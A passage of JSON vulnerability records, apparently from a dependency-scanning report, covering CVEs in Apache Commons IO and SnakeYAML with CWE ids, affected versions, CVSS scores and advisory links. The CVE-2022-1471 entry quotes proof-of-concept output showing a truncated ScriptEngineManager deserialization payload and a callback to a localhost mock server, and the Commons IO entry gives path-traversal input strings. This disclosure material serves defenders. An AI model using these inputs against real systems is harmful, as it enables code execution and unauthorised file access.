,"cve":"CVE-2021-29425","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-04-26T16:04:00","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2021-29425"},{"system_name":"Apache Advisory","text":"IO-556"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0004"}],"notes":[{"audience":"developers","category":"other","text":"Improper Limitation of a Pathname to a Restricted Directory","title":"Additional CWE: 22"},{"category":"description","details":"Vulnerability 
Description","text":"Path Traversal and Improper Input Validation in Apache Commons IO"},{"category":"details","details":"Vulnerability Details","text":"# Path Traversal and Improper Input Validation in Apache Commons IO In Apache Commons IO before 2.7, When invoking the method FileNameUtils.normalize with an improper input string, like \"//../foo\", or \"\\\\..\\foo\", the result would be the same value, thus possibly providing access to files in the parent directory, but not further above (thus \"limited\" path traversal), if the calling code would use the result to construct a path value."}],"product_status":{"known_affected":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"],"known_not_affected":["commons-io/commons-io@2.7"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Apache Advisory IO-556","url":"https://issues.apache.org/jira/browse/IO-556"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r01b4a1fcdf3311c936ce33d75a9398b6c255f00c1a2f312ac21effe1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bfa8f7921abdfae788b1f076a12f73a92c93cc0a6e1083bce0027c5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0d73e2071d1f1afe1a15da14c5b6feb2cf17e3871168d5a3c8451436@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c2f4683c35696cf6f863e3c107e37ec41305b1930dd40c17260de71@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r20416f39ca7f7344e7d76fe4d7063bb1d91ad106926626e7e83fb346@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2345b49dbffa8a5c3c589c082fe39228a2c1d14f11b96c523da701db@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r27b1eedda37468256c4bb768fde1e8b79b37ec975cbbfd0d65a7ac34@%3Cdev.myfaces.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2bc986a070457daca457a54fe71ee09d2584c24dc262336ca32b6a19@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2df50af2641d38f432ef025cd2ba5858215cc0cf3fc10396a674ad2e@%3Cpluto-scm.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r345330b7858304938b7b8029d02537a116d75265a598c98fa333504a@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4050f9f6b42ebfa47a98cbdee4aabed4bb5fb8093db7dbb88faceba2@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r462db908acc1e37c455e11b1a25992b81efd18e641e7e0ceb1b6e046@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r477c285126ada5c3b47946bb702cb222ac4e7fd3100c8549bdd6d3b2@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47ab6f68cbba8e730f42c4ea752f3a44eb95fb09064070f2476bb401@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5149f78be265be69d34eacb4e4b0fc7c9c697bcdfa91a1c1658d717b@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r523a6ffad58f71c4f3761e3cee72df878e48cdc89ebdce933be1475c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r808be7d93b17a7055c1981a8453ae5f0d0fce5855407793c5d0ffffa@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8569a41d565ca880a4dee0e645dad1cd17ab4a92e68055ad9ebb7375@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r86528f4b7d222aed7891e7ac03d69a0db2a2dfa17b86ac3470d7f374@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r873d5ddafc0a68fd999725e559776dc4971d1ab39c0f5cc81bd9bc04@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8bfc7235e6b39d90e6f446325a5a44c3e9e50da18860fdabcee23e29@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8efcbabde973ea72f5e0933adc48ef1425db5cde850bf641b3993f31@%3Cdev.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92ea904f4bae190b03bd42a4355ce3c2fbe8f36ab673e03f6ca3f9fa@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8ef65aedc086d2d3d21492b4c08ae0eb8a3a42cc52e29ba1bc009d8@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raa053846cae9d497606027816ae87b4e002b2e0eb66cb0dee710e1f5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad4ae544747df32ccd58fff5a86cd556640396aeb161aa71dd3d192a@%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbebd3e19651baa7a4a5503a9901c95989df9d40602c8e35cb05d3eb5@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rc10fa20ef4d13cbf6ebe0b06b5edb95466a1424a9b7673074ed03260@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dd3204260e9227a67253ef68b6f1599446005bfa0e1ddce4573a80@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc359823b5500e9a9a2572678ddb8e01d3505a7ffcadfa8d13b8780ab%40%3Cuser.commons.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc5f3df5316c5237b78a3dff5ab95b311ad08e61d418cd992ca7e34ae@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc65f9bc679feffe4589ea0981ee98bc0af9139470f077a91580eeee0@%3Cpluto-dev.portals.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca71a10ca533eb9bfac2d590533f02e6fb9064d3b6aa3ec90fdc4f51@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd09d4ab3e32e4b3a480e2ff6ff118712981ca82e817f28f2a85652a6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re41e9967bee064e7369411c28f0f5b2ad28b8334907c9c6208017279@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/red3aea910403d8620c73e1c7b9c9b145798d0469eb3298a7be7891af@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfa2f08b7c0caf80ca9f4a18bd875918fdd4e894e2ea47942a4589b9c@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfcd2c649c205f12b72dde044f905903460669a220a2eb7e12652d19d@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rfd01af05babc95b8949e6d8ea78d9834699e1b06981040dde419a330@%3Cdev.commons.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00016.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29425"},{"summary":"NetApp Advisory ntap-20220210-0004","url":"https://security.netapp.com/advisory/ntap-20220210-0004"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["commons-io/commons-io@vers:maven/>=0.1|<=2.6"]}],"title":"CVE-2021-29425/pkg:maven/commons-io/commons-io@2.5?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25857"]}],"cve":"CVE-2022-25857","cwe":{"id":"400","name":"Uncontrolled Resource 
Consumption"},"discovery_date":"2022-08-31T00:00:24","ids":[{"system_name":"CVE Record","text":"CVE-2022-25857"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-ORGYAML-2806360"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Improper Restriction of Recursive Entity References in DTDs","title":"Additional CWE: 776"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in snakeyaml"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in snakeyaml The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25857"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"},{"summary":"Snyk Advisory 
SNYK-JAVA-ORGYAML-2806360","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-25857/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38751"]}],"cve":"CVE-2022-38751","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38751"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). 
If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38751"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38751/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38752"]}],"cve":"CVE-2022-38752","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38752"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp 
Advisory","text":"ntap-20240315-0009"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"],"known_not_affected":["org.yaml/snakeyaml@1.32"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38752"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory 
ntap-20240315-0009","url":"https://security.netapp.com/advisory/ntap-20240315-0009"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.31"]}],"title":"CVE-2022-38752/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38749"]}],"cve":"CVE-2022-38749","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"Arxiv Advisory","text":"2306"},{"system_name":"CVE Record","text":"CVE-2022-38749"},{"system_name":"Gentoo Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). 
If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Arxiv Advisory 2306","url":"https://arxiv.org/pdf/2306.05534.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38749"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38749/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-38750"]}],"cve":"CVE-2022-38750","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-06T00:00:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-38750"},{"system_name":"Gentoo 
Advisory","text":"glsa-202305-28"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0010"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write"},{"category":"details","details":"Vulnerability Details","text":"# snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow."}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"],"known_not_affected":["org.yaml/snakeyaml@1.31"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-38750"},{"summary":"Gentoo Advisory glsa-202305-28","url":"https://security.gentoo.org/glsa/202305-28"},{"summary":"NetApp Advisory 
ntap-20240315-0010","url":"https://security.netapp.com/advisory/ntap-20240315-0010"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.30"]}],"title":"CVE-2022-38750/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"cve":"CVE-2022-1471","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-12-12T21:19:47","ids":[{"system_name":"CVE Record","text":"CVE-2022-1471"},{"system_name":"GitHub Advisory","text":"GHSA-mjmj-j48q-9wg2"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0015"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"SnakeYaml Constructor Deserialization Remote Code Execution"},{"category":"details","details":"Vulnerability Details","text":"# SnakeYaml Constructor Deserialization Remote Code Execution ### Summary SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows any type be deserialized given the following line: new Yaml(new Constructor(TestDataClass.class)).load(yamlContent); Types do not have to match the types of properties in the target class. 
A `ConstructorException` is thrown, but only after a malicious payload is deserialized. ### Severity High, lack of type checks during deserialization allows remote code execution. ### Proof of Concept Execute `bash run.sh`. The PoC uses Constructor to deserialize a payload for RCE. RCE is demonstrated by using a payload which performs a http request to http://127.0.0.1:8000. Example output of successful run of proof of concept: ``` $ bash run.sh [+] Downloading snakeyaml if needed [+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE nc: no process found [+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server. [+] An exception is expected. Exception: Cannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0 in 'string', line 1, column 1: payload: !!javax.script.ScriptEn ... ^ Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager in 'string', line 1, column 10: payload: !!javax.script.ScriptEngineManag ... 
^ at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291) at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172) at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332) at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230) at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220) at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174) at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158) at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491) at org.yaml.snakeyaml.Yaml.load(Yaml.java:416) at Main.main(Main.java:37) Caused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167) at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171) at java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81) at java.base/java.lang.reflect.Field.set(Field.java:780) at org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44) at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286) ... 9 more [+] Dumping Received HTTP Request. Will not be empty if PoC worked GET /proof-of-concept HTTP/1.1 User-Agent: Java/11.0.14 Host: localhost:8000 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive ``` ### Further Analysis Potential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content. 
See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject. A fix was released in version 2.0. See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64876314 for more information. ### Timeline **Date reported**: 4/11/2022 **Date fixed**: **Date disclosed**: 10/13/2022"}],"product_status":{"known_affected":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/19/1"},{"summary":"GitHub Advisory GHSA-mjmj-j48q-9wg2","url":"https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-1471"},{"summary":"NetApp Advisory ntap-20230818-0015","url":"https://security.netapp.com/advisory/ntap-20230818-0015"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"Cve 
2022","url":"https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":8.3,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.3,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":8.3,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L","version":"3.1"},"products":["org.yaml/snakeyaml@vers:maven/>=1.4|<=1.33"]}],"title":"CVE-2022-1471/pkg:maven/org.yaml/snakeyaml@1.21?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-41854"]}],"cve":"CVE-2022-41854","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-11-11T19:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-41854"},{"system_name":"NetApp Advisory","text":"ntap-20240315-0009"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability 